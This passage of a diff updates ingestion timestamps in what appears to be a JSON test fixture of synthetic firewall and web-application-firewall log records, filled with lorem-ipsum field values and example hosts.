type=hende subtype=umdol level=medium vd=psaq srcip=10.24.154.250 srcport=2108 srcintf=eth2707 dstip=10.124.187.230 dstport=6119 dstintf=lo105 poluuid=mqu sessionid=tse proto=udp action=accept policyid=ueip trandisp=amvo duration=20.956000 sentbyte=2068 rcvdbyte=306 devtype=reetdolo osname=tten osversion=1.979 mastersrcmac=usa srcmac=01:00:5e:6a:a6:c9 crscore=45.307000 craction=oremagna crlevel=siuta eventtype=amnihil user=nderit service=ficia hostname=tru3812.mail.lan profile=olo reqtype=xer url=https://api.example.net/nsec/smo.gif?etq=trumexe#rai direction=outbound msg=tNequepo method=byCicer cat=imvenia catdesc=ipit device_id=tdolorem log_id=nderitin pri=low userfrom=enderitq adminprof=amvolu timezone=GMT-07:00 main_type=temvele trigger_policy=ofd sub_type=quam severity_level=umdol policy=porincid src=10.106.101.87 src_port=7569 dst=10.247.124.74 dst_port=2491 http_method=inea http_url=ipsu http_host=iden http_agent=oreseo http_session_id=edictasu signature_subclass=aerat signature_id=4358 srccountry=lites content_switch_name=col server_pool_name=litsedd false_positive_mitigation=mnis user_name=ainci monitor_status=aturve http_refer=https://api.example.com/mporain/secte.txt?amqui=rume#uptate http_version=tisundeo dev_id=uid threat_weight=eFini history_threat_weight=mnis threat_level=tametco ftp_mode=snisiut ftp_cmd=lit cipher_suite=laborio msg_id=aaliqu", "event": { - "ingested": "2021-06-29T09:33:01.618517900Z" + "ingested": "2021-12-09T13:37:31.907159Z" }, "tags": [ "preserve_original_event" @@ -786,7 +786,7 @@ }, "message": "date=2018-8-15 time=7:57:06 devname=mid device_id=henderi log_id=consec type=event subtype=dquia pri=high desc=isiutali user=rehe userfrom=volupta msg=etcons action=deny adom=etdol408.internal.home session_id=agnamali", "event": { - "ingested": "2021-06-29T09:33:01.618523200Z" + "ingested": "2021-12-09T13:37:31.907181100Z" }, "tags": [ "preserve_original_event" @@ -798,7 +798,7 @@ }, "message": "date=2018-8-29 time=2:59:40 logver=cae devid=Utenimad devname=onsequ logid=Bon type=amquisno subtype=mullam level=very-high vd=admi srcip=10.111.106.60 srcport=5449 srcintf=lo5820 dstip=10.142.181.192 dstport=4386 dstintf=lo6200 poluuid=lmolest sessionid=miurerep proto=17 action=allow policyid=Sed trandisp=isau duration=66.574000 sentbyte=75 rcvdbyte=806 devtype=idest osname=ostru osversion=1.4342 mastersrcmac=enimip srcmac=01:00:5e:11:d6:5d crscore=66.141000 craction=umquiado crlevel=taspe eventtype=empori user=mipsum service=tium hostname=riaturE1644.www5.example profile=ender reqtype=uine url=https://internal.example.com/dolo/exeacom.txt?tlab=eufugiat#upta direction=internal msg=reetdo method=mad cat=mdolor catdesc=amcorpor device_id=oremquel log_id=san pri=high userfrom=amqui adminprof=itatise timezone=GMT-07:00 main_type=cia trigger_policy=lup sub_type=cipitla severity_level=niam policy=mullamc src=10.215.144.167 src_port=6675 dst=10.162.114.52 dst_port=2925 http_method=quepor http_url=Lor http_host=ten http_agent=exeacomm http_session_id=cusan signature_subclass=oquisq signature_id=4993 srccountry=ihilmol content_switch_name=seosqui server_pool_name=tiset false_positive_mitigation=ciade user_name=erspici monitor_status=xercitat http_refer=https://internal.example.net/utlab/entoreve.html?umdol=nseq#autodita http_version=loreme dev_id=eratv threat_weight=tametcon history_threat_weight=orsi threat_level=ull ftp_mode=mcor ftp_cmd=iamquis cipher_suite=aeabi msg_id=ore", "event": { - "ingested": "2021-06-29T09:33:01.618529600Z" + "ingested": "2021-12-09T13:37:31.907186800Z" }, "tags": [ "preserve_original_event" @@ -810,7 +810,7 @@ }, "message": "date=2018-9-12 time=10:02:15 logver=catcup devid=ectetur devname=cons logid=spiciati type=upidata subtype=utlabo level=high vd=ersp srcip=10.101.207.156 srcport=2086 srcintf=enp0s4931 dstip=10.12.8.82 dstport=4369 dstintf=enp0s7520 poluuid=nemull sessionid=trumex proto=6 action=accept policyid=doloremq trandisp=iade duration=26.420000 sentbyte=5013 rcvdbyte=7641 devtype=uidolo osname=ita osversion=1.6452 mastersrcmac=rchite srcmac=01:00:5e:41:90:bf crscore=107.693000 craction=tionem crlevel=volupta eventtype=adol user=econsequ service=orever hostname=mdolo7008.api.corp profile=reetdolo reqtype=psam url=https://www5.example.org/orumet/aliqu.txt?tion=sun#utod direction=outbound msg=rinci method=uamestqu cat=riatu catdesc=ulaparia device_id=remagna log_id=fugi pri=very-high userfrom=xerc adminprof=caecat timezone=OMST main_type=cor trigger_policy=nonnumqu sub_type=uidexea severity_level=emu policy=asia src=10.162.128.87 src_port=6214 dst=10.78.75.82 dst_port=7799 http_method=uptat http_url=con http_host=tem http_agent=orpori http_session_id=lor signature_subclass=quiinea signature_id=7098 srccountry=rroquis content_switch_name=dolorema server_pool_name=prehe false_positive_mitigation=bori user_name=Sedutp monitor_status=ritinvo http_refer=https://internal.example.net/ica/nat.jpg?ddoe=nsequ#lloinve http_version=tdolo dev_id=billoi threat_weight=sequu history_threat_weight=ffic threat_level=imadmini ftp_mode=isnostru ftp_cmd=ostr cipher_suite=tinvo msg_id=lorumwr", "event": { - "ingested": "2021-06-29T09:33:01.618536800Z" + "ingested": "2021-12-09T13:37:31.907192400Z" }, "tags": [ "preserve_original_event" @@ -822,7 +822,7 @@ }, "message": "logver=ctetura devname=\"reseosqu\" devid=\"ittenbyC\" vd=tlabor date=2018-9-27 time=5:04:49 logid=auteir type=uredolo subtype=uido level=medium eventtime=quiratio logtime=aincidu srcip=10.75.198.93 srcport=1982 srcintf=eth725 srcintfrole=umqu dstip=10.137.36.151 dstport=196 dstintf=lo1813 dstintfrole=rspici poluuid=duntutla sessionid=emeu proto=1 action=block policyid=atemUten policytype=turadipi crscore=16.226000 craction=estqu crlevel=orinre appcat=prehen service=equa srccountry=ciatisun dstcountry=mdolorem trandisp=nnumq tranip=10.51.106.43 tranport=6486 duration=78.551000 sentbyte=3531 rcvdbyte=5464 sentpkt=oremeumf app=volupt", "event": { - "ingested": "2021-06-29T09:33:01.618544100Z" + "ingested": "2021-12-09T13:37:31.907198200Z" }, "tags": [ "preserve_original_event" @@ -834,7 +834,7 @@ }, "message": "logver=tnulapa devname=\"caecatcu\" devid=\"xcepte\" vd=deserun date=2018-10-11 time=12:07:23 logid=mvol type=erep subtype=teurs level=low eventtime=tiumdol logtime=byCicer srcip=10.154.151.111 srcport=5860 srcintf=eth1273 srcintfrole=uisnos dstip=10.7.230.206 dstport=5757 dstintf=lo1291 dstintfrole=pisc poluuid=eumfu sessionid=tseddoe proto=HOPOPT action=allow policyid=emulla policytype=bill crscore=147.522000 craction=oditaut crlevel=oloremqu appcat=untNeque service=reetdol srccountry=perspi dstcountry=tlab trandisp=udexerci tranip=10.249.93.150 tranport=799 duration=113.020000 sentbyte=2808 rcvdbyte=5744 sentpkt=ovolup app=squ", "event": { - "ingested": "2021-06-29T09:33:01.618551200Z" + "ingested": "2021-12-09T13:37:31.907206800Z" }, "tags": [ "preserve_original_event" @@ -846,7 +846,7 @@ }, "message": "date=2018-10-25 time=7:09:57 logver=dolor devid=lit devname=ptatem logid=oeiusmod type=ugi subtype=utaliq level=very-high vd=toc srcip=10.76.177.154 srcport=1428 srcintf=eth4425 dstip=10.207.160.170 dstport=7037 dstintf=lo1570 poluuid=reseo sessionid=iration proto=tcp action=deny policyid=magn trandisp=iaecon duration=54.100000 sentbyte=622 rcvdbyte=6280 devtype=ill osname=oris osversion=1.5718 mastersrcmac=ulamcol srcmac=01:00:5e:19:ce:4b crscore=142.771000 craction=oNe crlevel=utfu eventtype=santiumd user=cididunt service=ctasu hostname=itse5466.api.example profile=ica reqtype=mnisis url=https://internal.example.com/nonnumqu/isciveli.gif?wri=aute#iscin direction=outbound msg=uat method=itasper cat=nibusBo catdesc=volupta device_id=olorinr log_id=iameaq pri=high userfrom=docons adminprof=uun timezone=OMST main_type=mremap trigger_policy=ate sub_type=agnaal severity_level=ibusB policy=mexe src=10.217.209.221 src_port=3639 dst=10.26.4.3 dst_port=5291 http_method=rsitame http_url=eca http_host=quirat http_agent=urmagn http_session_id=essec signature_subclass=prehende signature_id=1261 srccountry=setquas content_switch_name=nti server_pool_name=osamnis false_positive_mitigation=atisetqu user_name=ciduntut monitor_status=atisu http_refer=https://internal.example.com/architec/incul.txt?aborios=mco#amnisiu http_version=suntincu dev_id=lore threat_weight=equatu history_threat_weight=enbyCi threat_level=dolo ftp_mode=adipi ftp_cmd=beata cipher_suite=evelites msg_id=ipiscive", "event": { - "ingested": "2021-06-29T09:33:01.618558500Z" + "ingested": "2021-12-09T13:37:31.907212300Z" }, "tags": [ "preserve_original_event" @@ -858,7 +858,7 @@ }, "message": "logver=umtot date=2018-11-9 time=2:12:32 log_id=eumiurer devid=inv devname=eac logid=rainc type=tinculp subtype=uianon level=high vd=corpori srcip=10.232.131.132 srcport=581 srcintf=enp0s6255 dstip=10.232.246.98 dstport=1854 dstintf=enp0s1526 poluuid=ivelit sessionid=itlabori proto=icmp action=accept policyid=oide trandisp=magni duration=72.993000 sentbyte=5817 rcvdbyte=6960 devtype=rrorsit osname=emipsu osversion=1.6603 mastersrcmac=temUte srcmac=01:00:5e:fe:be:28 crscore=134.746000 craction=hitec crlevel=sci eventtype=luptatev user=ruredo service=iamquis hostname=dquiac6194.api.lan profile=nidolo reqtype=runtmoll url=https://www5.example.org/utlabo/scip.html?voluptas=inv#upta direction=external msg=ors method=olupta cat=raincidu catdesc=nisi device_id=uipexea log_id=taedic pri=high userfrom=ugi adminprof=urExcep timezone=CET main_type=usant trigger_policy=uidolore sub_type=litse severity_level=ugitse policy=utfugi src=10.241.140.241 src_port=1813 dst=10.180.162.174 dst_port=7186 http_method=ido http_url=atnu http_host=ssuscipi http_agent=evita http_session_id=tconsect signature_subclass=lpaquiof signature_id=532 srccountry=lors content_switch_name=Finibus server_pool_name=totam false_positive_mitigation=idat user_name=nulapar monitor_status=git http_refer=https://www5.example.com/odtem/tati.jpg?ueips=umqu#ntexpli http_version=siuta dev_id=porincid threat_weight=itame history_threat_weight=inv threat_level=remaper ftp_mode=quaUteni ftp_cmd=evelit cipher_suite=oluptat msg_id=ditem", "event": { - "ingested": "2021-06-29T09:33:01.618565700Z" + "ingested": "2021-12-09T13:37:31.907216900Z" }, "tags": [ "preserve_original_event" @@ -870,7 +870,7 @@ }, "message": "date=2018-11-23 time=9:15:06 devname=oditautf device_id=asiarc log_id=eddoei type=generic subtype=iatqu pri=very-high devid=itessec devname=dat logid=tdol type=emul subtype=ariatu level=high vd=reseo srcip=10.53.70.207 srcport=1793 srcintf=lo2279 dstip=10.73.140.61 dstport=2114 dstintf=lo368 poluuid=stlabo sessionid=atema proto=1 action=deny policyid=orporiss trandisp=iamq duration=128.426000 sentbyte=1800 rcvdbyte=5783 devtype=pis osname=riosam osversion=1.2052 mastersrcmac=iosam srcmac=01:00:5e:21:d3:0a crscore=65.426000 craction=archi crlevel=nes eventtype=atvolupt user=umwritt service=uae hostname=amco1592.mail.host profile=aaliq reqtype=olupta url=https://internal.example.com/ssusci/snostrud.txt?dolo=siutaliq#obeata direction=outbound msg=tame method=olo cat=vel catdesc=equamn device_id=tempora log_id=enimip pri=very-high userfrom=saqua adminprof=aperia timezone=OMST main_type=tNeque trigger_policy=metcon sub_type=enimadmi severity_level=orem policy=corpor src=10.110.99.222 src_port=5685 dst=10.62.140.108 dst_port=1225 http_method=ssitasp http_url=ptat http_host=asp http_agent=uatDui http_session_id=nofdeFin signature_subclass=unde signature_id=3979 srccountry=seruntm content_switch_name=aera server_pool_name=scive false_positive_mitigation=ngelit user_name=moenimi monitor_status=mqu http_refer=https://mail.example.org/ueipsaq/upid.gif?utla=emUte#tisund http_version=tutla dev_id=isund threat_weight=atemU history_threat_weight=uidex threat_level=uptate ftp_mode=eac ftp_cmd=peria cipher_suite=amaliq msg_id=ium", "event": { - "ingested": "2021-06-29T09:33:01.618572900Z" + "ingested": "2021-12-09T13:37:31.907221300Z" }, "tags": [ "preserve_original_event" @@ -882,7 +882,7 @@ }, "message": "logver=ptate date=2018-12-7 time=4:17:40 log_id=tenatu devid=emo devname=ratio logid=maperia type=Maloru subtype=sumquia level=low vd=imadmini srcip=10.237.5.219 srcport=3828 srcintf=eth4604 dstip=10.197.99.150 dstport=3877 dstintf=enp0s7388 poluuid=odo sessionid=itseddoe proto=prm action=accept policyid=itinvo trandisp=uiavol duration=96.864000 sentbyte=2685 rcvdbyte=7612 devtype=urmagn osname=ficiade osversion=1.2691 mastersrcmac=equ srcmac=01:00:5e:f5:2a:24 crscore=163.671000 craction=mipsum crlevel=dolor eventtype=cupidata user=niamquis service=lapariat hostname=dicta7226.mail.example profile=eddoei reqtype=cingel url=https://api.example.com/temporai/umw.jpg?mveniamq=litsed#ptasn direction=unknown msg=loinv method=umd cat=madmi catdesc=xercit device_id=avolup log_id=etdo pri=medium userfrom=veleum adminprof=emUten timezone=CT main_type=proiden trigger_policy=cita sub_type=iac severity_level=ntincul policy=mnisiste src=10.4.244.115 src_port=4588 dst=10.53.50.77 dst_port=5330 http_method=lorem http_url=lore http_host=orroqu http_agent=tlabo http_session_id=iameaque signature_subclass=sautemve signature_id=6466 srccountry=emoe content_switch_name=ameiusmo server_pool_name=ntiumtot false_positive_mitigation=aeab user_name=idolo monitor_status=temac http_refer=https://api.example.net/ollita/idolore.html?illu=iut#asiarc http_version=imidest dev_id=mwri threat_weight=orsi history_threat_weight=ritinvol threat_level=rporiss ftp_mode=atu ftp_cmd=ddo cipher_suite=veli msg_id=ata", "event": { - "ingested": "2021-06-29T09:33:01.618580100Z" + "ingested": "2021-12-09T13:37:31.907225300Z" }, "tags": [ "preserve_original_event" @@ -894,7 +894,7 @@ }, "message": "logver=lor dtime=2018-12-21 23:20:14.972538723 +0000 UTC devid=ori devname=eleumiu vd=amre date=2018-12-21 time=11:20:14 logid=atur type=untex subtype=Except level=very-high eventtime=econse logtime=iac srcip=10.221.100.157 srcport=865 srcintf=lo4518 srcintfrole=mqu dstip=10.236.211.111 dstport=1801 dstintf=enp0s454 dstintfrole=rauto poluuid=pteursi sessionid=iquamqua proto=tcp action=allow policyid=psumqui policytype=equeporr crscore=32.741000 craction=cusanti crlevel=doloreme appcat=nsecte service=reprehen srccountry=taspe dstcountry=litess trandisp=enimadm tranip=10.120.212.78 tranport=119 duration=17.257000 sentbyte=4752 rcvdbyte=3484 sentpkt=ntsuntin app=ectetur", "event": { - "ingested": "2021-06-29T09:33:01.618587400Z" + "ingested": "2021-12-09T13:37:31.907229200Z" }, "tags": [ "preserve_original_event" @@ -906,7 +906,7 @@ }, "message": "date=2019-1-5 time=6:22:49 logver=intocca devid=vel devname=xeacom logid=orum type=voluptat subtype=nsequ level=medium vd=tenimad srcip=10.140.215.210 srcport=7229 srcintf=lo568 dstip=10.71.213.217 dstport=7475 dstintf=eth5820 poluuid=lup sessionid=reetdolo proto=HOPOPT action=accept policyid=dolor trandisp=emagnam duration=154.150000 sentbyte=2336 rcvdbyte=5326 devtype=emull osname=enatuser osversion=1.3052 mastersrcmac=ectob srcmac=01:00:5e:4a:5d:af crscore=9.013000 craction=niamqu crlevel=nrep eventtype=lauda user=ionevo service=busB hostname=pidatatn2627.www.localdomain profile=eritinvo reqtype=quiav url=https://mail.example.org/ngelit/dipiscin.gif?serro=ctet#umiurere direction=inbound msg=ciun method=ssitaspe cat=deomnis catdesc=ulamcol device_id=onn log_id=redol pri=medium userfrom=utlabore adminprof=nci timezone=OMST main_type=liqu trigger_policy=ectetura sub_type=aUte severity_level=untNeque policy=roi src=10.210.82.202 src_port=2749 dst=10.208.231.15 dst_port=412 http_method=rios http_url=diconseq http_host=tenima http_agent=iusm http_session_id=mveleumi signature_subclass=equinesc signature_id=5076 srccountry=mfugiatq content_switch_name=dmini server_pool_name=emveleu false_positive_mitigation=loree user_name=riatur monitor_status=tempor http_refer=https://internal.example.com/spiciati/tise.gif?ctas=rvelillu#qua http_version=ciat dev_id=iamq threat_weight=porin history_threat_weight=yCi threat_level=arc ftp_mode=santium ftp_cmd=numquame cipher_suite=umfugi msg_id=amestqui", "event": { - "ingested": "2021-06-29T09:33:01.618594600Z" + "ingested": "2021-12-09T13:37:31.907232800Z" }, "tags": [ "preserve_original_event" @@ -918,7 +918,7 @@ }, "message": "logver=tesseq devname=\"nimides\" devid=\"iusmodte\" vd=involup date=2019-1-19 time=1:25:23 logid=edd type=dolorsi subtype=mcolabo level=low eventtime=exe logtime=nve srcip=10.226.255.3 srcport=5449 srcintf=lo7680 srcintfrole=iaconseq dstip=10.123.59.69 dstport=5399 dstintf=lo5835 dstintfrole=ntsunti poluuid=bor sessionid=uisnos proto=6 action=accept policyid=tation policytype=seddoe crscore=21.625000 craction=eur crlevel=ntmolli appcat=pitl service=nulap srccountry=ipexe dstcountry=aqueipsa trandisp=psum tranip=10.53.251.202 tranport=7501 duration=131.751000 sentbyte=6876 rcvdbyte=220 sentpkt=ugi app=ptate", "event": { - "ingested": "2021-06-29T09:33:01.618601800Z" + "ingested": "2021-12-09T13:37:31.907237300Z" }, "tags": [ "preserve_original_event" @@ -930,7 +930,7 @@ }, "message": "logver=rur devname=\"edut\" devid=\"sitametc\" vd=iarchite date=2019-2-2 time=8:27:57 logid=uide type=iono subtype=aboris level=very-high eventtime=imidest logtime=ulamc srcip=10.3.85.176 srcport=318 srcintf=eth2546 srcintfrole=uptateve dstip=10.212.56.26 dstport=3032 dstintf=enp0s2353 dstintfrole=loin poluuid=cinge sessionid=tutl proto=udp action=block policyid=nesciu policytype=ueip crscore=162.484000 craction=orumSe crlevel=mSe appcat=itame service=quaturv srccountry=lumdolor dstcountry=persp trandisp=leumi tranip=10.29.141.252 tranport=2077 duration=106.468000 sentbyte=3472 rcvdbyte=7868 sentpkt=orum app=reseos", "event": { - "ingested": "2021-06-29T09:33:01.618608900Z" + "ingested": "2021-12-09T13:37:31.907243600Z" }, "tags": [ "preserve_original_event" @@ -942,7 +942,7 @@ }, "message": "date=2019-2-17 time=3:30:32 devname=orem device_id=seq log_id=cus type=generic subtype=tnulap pri=very-high devid=psamvolu devname=inculp logid=eni type=tcupid subtype=ercita level=very-high vd=olorinr srcip=10.110.166.81 srcport=7354 srcintf=lo3023 dstip=10.181.48.82 dstport=1225 dstintf=eth7640 poluuid=conseq sessionid=Nemoen proto=6 action=cancel policyid=umquamei trandisp=nih duration=55.527000 sentbyte=3449 rcvdbyte=4658 devtype=quia osname=eabill osversion=1.95 mastersrcmac=oeiusmo srcmac=01:00:5e:82:ca:1b crscore=67.321000 craction=rumwrit crlevel=tionofd eventtype=ill user=orroquis service=laparia hostname=emveleu4029.api.local profile=tconse reqtype=ntsun url=https://internal.example.net/inc/riaturEx.htm?mnihilm=itinvo#lestia direction=external msg=metcons method=lumd cat=liquaUt catdesc=snos device_id=maccusan log_id=oeni pri=medium userfrom=tiaecon adminprof=tincu timezone=GMT-07:00 main_type=untmoll trigger_policy=par sub_type=idatatno severity_level=tfugit policy=tla src=10.126.11.186 src_port=589 dst=10.236.175.163 dst_port=6562 http_method=atemqui http_url=icaboN http_host=Utenimad http_agent=res http_session_id=officiad signature_subclass=nsectet signature_id=3977 srccountry=temU content_switch_name=ciduntut server_pool_name=ionofd false_positive_mitigation=etqua user_name=udantiu monitor_status=tium http_refer=https://internal.example.net/leumiu/iuta.html?tfugit=rorsitv#tiaecons http_version=uamestq dev_id=aliquaUt threat_weight=boreet history_threat_weight=mquam threat_level=volu ftp_mode=nof ftp_cmd=boNe cipher_suite=ovolu msg_id=cid", "event": { - "ingested": "2021-06-29T09:33:01.618617900Z" + "ingested": "2021-12-09T13:37:31.907248900Z" }, "tags": [ "preserve_original_event" @@ -954,7 +954,7 @@ }, "message": "logver=equamn devname=\"mes\" devid=\"itatio\" vd=ssecillu date=2019-3-3 time=10:33:06 logid=oeius type=itin subtype=nostrud level=medium eventtime=byCic logtime=mnisiuta srcip=10.171.60.173 srcport=209 srcintf=lo1917 srcintfrole=usmodite dstip=10.11.150.136 dstport=3615 dstintf=lo5438 dstintfrole=olup poluuid=urQuis sessionid=iquip proto=1 action=cancel policyid=untutl policytype=elite crscore=176.898000 craction=ipsaq crlevel=spici appcat=nvolupt service=antiu srccountry=llumquid dstcountry=paq trandisp=olup tranip=10.83.98.220 tranport=1300 duration=73.115000 sentbyte=5812 rcvdbyte=3339 sentpkt=amquis app=umtotam", "event": { - "ingested": "2021-06-29T09:33:01.618623600Z" + "ingested": "2021-12-09T13:37:31.907270400Z" }, "tags": [ "preserve_original_event" @@ -966,7 +966,7 @@ }, "message": "logver=pitlabo dtime=2019-03-17 17:35:40.532538723 +0000 UTC devid=lorsita devname=datatno vd=emac date=2019-3-17 time=5:35:40 logid=uiavo type=tdo subtype=ratvolup level=high eventtime=dolo logtime=quioffic srcip=10.238.49.73 srcport=1554 srcintf=enp0s11 srcintfrole=riatu dstip=10.74.88.209 dstport=740 dstintf=lo5287 dstintfrole=quep poluuid=tfugitse sessionid=oenimips proto=udp action=deny policyid=mdo policytype=map crscore=148.871000 craction=osqui crlevel=consequ appcat=catcupid service=velitess srccountry=sit dstcountry=ipisc trandisp=onsectet tranip=10.92.3.166 tranport=5777 duration=156.314000 sentbyte=715 rcvdbyte=3946 sentpkt=itvol app=dolo", "event": { - "ingested": "2021-06-29T09:33:01.618628900Z" + "ingested": "2021-12-09T13:37:31.907275800Z" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ }, "message": "logver=amquisno dtime=2019-04-01 00:38:14.792538723 +0000 UTC devid=uptasnul devname=ptate vd=deri date=2019-4-1 time=12:38:14 logid=periamea type=equatD subtype=quaturQu level=high eventtime=rpo logtime=inr srcip=10.119.248.36 srcport=2450 srcintf=enp0s1885 srcintfrole=ten dstip=10.187.107.47 dstport=288 dstintf=lo2445 dstintfrole=fugia poluuid=psa sessionid=iset proto=prm action=allow policyid=ecte policytype=ionemull crscore=84.399000 craction=sBo crlevel=nimides appcat=iurere service=edolorin srccountry=labor dstcountry=quelaud trandisp=ira tranip=10.84.200.121 tranport=3226 duration=128.212000 sentbyte=2150 rcvdbyte=4329 sentpkt=nos app=icta", "event": { - "ingested": "2021-06-29T09:33:01.618636400Z" + "ingested": "2021-12-09T13:37:31.907281300Z" }, "tags": [ "preserve_original_event" @@ -990,7 +990,7 @@ }, "message": "logver=itseddo devname=\"tasu\" devid=\"mquae\" vd=CSedu date=2019-4-15 time=7:40:49 logid=atae type=aeconseq subtype=boNemo level=very-high eventtime=nemulla logtime=tmollit srcip=10.167.128.229 srcport=4052 srcintf=eth1833 srcintfrole=ciatisu dstip=10.135.213.17 dstport=6427 dstintf=eth6468 dstintfrole=ritat poluuid=dipi sessionid=asnulapa proto=prm action=block policyid=onsequa policytype=seddoe crscore=23.021000 craction=Bonorume crlevel=emeumfu appcat=tla service=uidexea srccountry=odtem dstcountry=nvolupt trandisp=stia tranip=10.30.239.222 tranport=1546 duration=10.721000 sentbyte=6561 rcvdbyte=1057 sentpkt=itectobe app=rroq", "event": { - "ingested": "2021-06-29T09:33:01.618643800Z" + "ingested": "2021-12-09T13:37:31.907286700Z" }, "tags": [ "preserve_original_event" @@ -1002,7 +1002,7 @@ }, "message": "date=2019-4-29 time=2:43:23 devname=uunt device_id=pic log_id=unt type=generic subtype=emUt pri=medium devid=pernatur devname=orem logid=enbyCice type=velil subtype=nsequat level=low vd=duntutl srcip=10.238.172.76 srcport=156 srcintf=lo1215 dstip=10.201.119.253 dstport=2230 dstintf=enp0s7218 poluuid=nimad sessionid=tionu proto=udp action=block policyid=emagna trandisp=quin duration=68.078000 sentbyte=2527 rcvdbyte=1150 devtype=consequ osname=min osversion=1.1028 mastersrcmac=edicta srcmac=01:00:5e:cd:6c:ed crscore=163.905000 craction=itinvolu crlevel=urerepre eventtype=iumdol user=serror service=uptass hostname=rspic5637.api.local profile=itatise reqtype=iut url=https://api.example.net/ita/esse.txt?amquis=iatquovo#rExce direction=inbound msg=uraut method=reetdol cat=umtotam catdesc=itaedi device_id=ant log_id=tiumt pri=very-high userfrom=ratvolup adminprof=iamqu timezone=CT main_type=quaturve trigger_policy=tsunti sub_type=ero severity_level=iusmodi policy=acomm src=10.169.133.219 src_port=92 dst=10.115.166.48 dst_port=7491 http_method=eleumiur http_url=ididun http_host=edi http_agent=gia http_session_id=uaturQui signature_subclass=emi signature_id=5446 srccountry=etM content_switch_name=eve server_pool_name=iru false_positive_mitigation=ipit user_name=emq monitor_status=elitsedq http_refer=https://www.example.net/onsequat/emagnaa.gif?itse=tco#nnumqua http_version=erit dev_id=lorsitam threat_weight=emagnama history_threat_weight=ute threat_level=Excep ftp_mode=utpersp ftp_cmd=rehe cipher_suite=tiumt msg_id=ulamc", "event": { - "ingested": "2021-06-29T09:33:01.618648500Z" + "ingested": "2021-12-09T13:37:31.907292100Z" }, "tags": [ "preserve_original_event" @@ -1014,7 +1014,7 @@ }, "message": "logver=runt date=2019-5-13 time=9:45:57 log_id=emipsu devid=icaboNem devname=Except logid=fugits type=maliquam subtype=mav level=very-high vd=ecill srcip=10.36.122.89 srcport=5040 srcintf=lo3887 dstip=10.206.76.186 dstport=741 dstintf=eth2435 poluuid=atisund sessionid=enbyCic proto=1 action=block policyid=nrepre trandisp=uisautem duration=145.667000 sentbyte=4247 rcvdbyte=4374 devtype=tio osname=aconseq osversion=1.4195 mastersrcmac=enatuser srcmac=01:00:5e:1a:9c:4f crscore=124.786000 craction=rcitatio crlevel=olore eventtype=ntexp user=atio service=roquisqu hostname=rror3870.www5.local profile=volu reqtype=occ url=https://www5.example.net/culpa/isun.txt?cola=tura#rat direction=internal msg=sect method=ing cat=nis catdesc=aboreet device_id=ulapari log_id=isetqu pri=high userfrom=ons adminprof=Sedu timezone=CEST main_type=icaboNem trigger_policy=enderi sub_type=edqu severity_level=cita policy=uidolore src=10.146.255.40 src_port=3003 dst=10.226.39.82 dst_port=3950 http_method=oluptate http_url=orumwrit http_host=aconse http_agent=ites http_session_id=abori signature_subclass=dolor signature_id=3543 srccountry=amqu content_switch_name=uamest server_pool_name=ntoccaec false_positive_mitigation=ites user_name=caecatcu monitor_status=iof http_refer=https://api.example.com/uae/mdolo.txt?aute=itatise#utpers http_version=equunt dev_id=Nemo threat_weight=itse history_threat_weight=lillumq threat_level=idid ftp_mode=uis ftp_cmd=velits cipher_suite=mmodo msg_id=rporissu", "event": { - "ingested": "2021-06-29T09:33:01.618652200Z" + "ingested": "2021-12-09T13:37:31.907297600Z" }, "tags": [ "preserve_original_event" @@ -1026,7 +1026,7 @@ }, "message": "logver=utemvel dtime=2019-05-28 04:48:31.832538723 +0000 UTC devid=exercita devname=emaperi vd=aspernat date=2019-5-28 time=4:48:31 logid=ddoei type=nihi subtype=umfu level=low eventtime=ehen logtime=olupt srcip=10.53.82.96 srcport=7088 srcintf=eth297 srcintfrole=nostru dstip=10.224.212.88 dstport=5404 dstintf=lo4266 dstintfrole=natuserr poluuid=ipi sessionid=eniamqui proto=icmp action=deny policyid=urvelill policytype=iadese crscore=174.116000 craction=isundeo crlevel=emq appcat=rehender service=uat srccountry=apa dstcountry=tani trandisp=per tranip=10.35.240.70 tranport=2587 duration=62.993000 sentbyte=7102 rcvdbyte=2380 sentpkt=ataevit app=chi", "event": { - "ingested": "2021-06-29T09:33:01.618656100Z" + "ingested": "2021-12-09T13:37:31.907303100Z" }, "tags": [ "preserve_original_event" @@ -1038,7 +1038,7 @@ }, "message": "logver=lorsita devname=\"oeius\" devid=\"trud\" vd=aco date=2019-6-11 time=11:51:06 logid=uei type=tsedqu subtype=agni level=very-high eventtime=rsint logtime=catc srcip=10.186.253.240 srcport=6982 srcintf=enp0s5429 srcintfrole=end dstip=10.233.128.7 dstport=2455 dstintf=eth5315 dstintfrole=onnumq poluuid=lupt sessionid=ugiatq proto=prm action=cancel policyid=utla policytype=iosamn crscore=164.209000 craction=tor crlevel=toreve appcat=ita service=orain srccountry=tnulap dstcountry=aevitae trandisp=aqu tranip=10.66.149.234 tranport=6236 duration=128.130000 sentbyte=6344 rcvdbyte=475 sentpkt=loremeu app=tate", "event": { - "ingested": "2021-06-29T09:33:01.618659500Z" + "ingested": "2021-12-09T13:37:31.907308500Z" }, "tags": [ "preserve_original_event" @@ -1050,7 +1050,7 @@ }, "message": "logver=elaud dtime=2019-06-25 18:53:40.352538723 +0000 UTC devid=iad devname=irat vd=upi date=2019-6-25 time=6:53:40 logid=rsintocc type=itanim subtype=sinto level=medium eventtime=lore logtime=eabi srcip=10.227.133.134 srcport=3351 srcintf=enp0s4820 srcintfrole=erspici dstip=10.46.11.114 dstport=4009 dstintf=enp0s7159 dstintfrole=oremq poluuid=rspiciat sessionid=ptas proto=tcp action=cancel policyid=ore policytype=dut crscore=128.554000 craction=remape crlevel=itectob appcat=sedquia service=mquisnos srccountry=mwritt dstcountry=avolupt trandisp=lumdolo tranip=10.173.140.201 tranport=6422 duration=133.394000 sentbyte=7249 rcvdbyte=1387 sentpkt=str app=sit", "event": { - "ingested": "2021-06-29T09:33:01.618664500Z" + "ingested": "2021-12-09T13:37:31.907313900Z" }, "tags": [ "preserve_original_event" @@ -1062,7 +1062,7 @@ }, "message": "logver=elillum dtime=2019-07-10 01:56:14.612538723 +0000 UTC devid=isnos devname=emp vd=eos date=2019-7-10 time=1:56:14 logid=sciveli type=Bonoru subtype=rai level=low eventtime=omm logtime=cepteu srcip=10.205.18.11 srcport=6737 srcintf=eth4759 srcintfrole=ueipsa dstip=10.69.130.207 dstport=1191 dstintf=eth614 dstintfrole=architec poluuid=era sessionid=ptatem proto=udp action=cancel policyid=isi policytype=ssecill crscore=44.181000 craction=exerci crlevel=ptatemUt appcat=temqu service=ofd srccountry=nimvenia dstcountry=ari trandisp=eir tranip=10.170.236.123 tranport=4346 duration=150.036000 sentbyte=6877 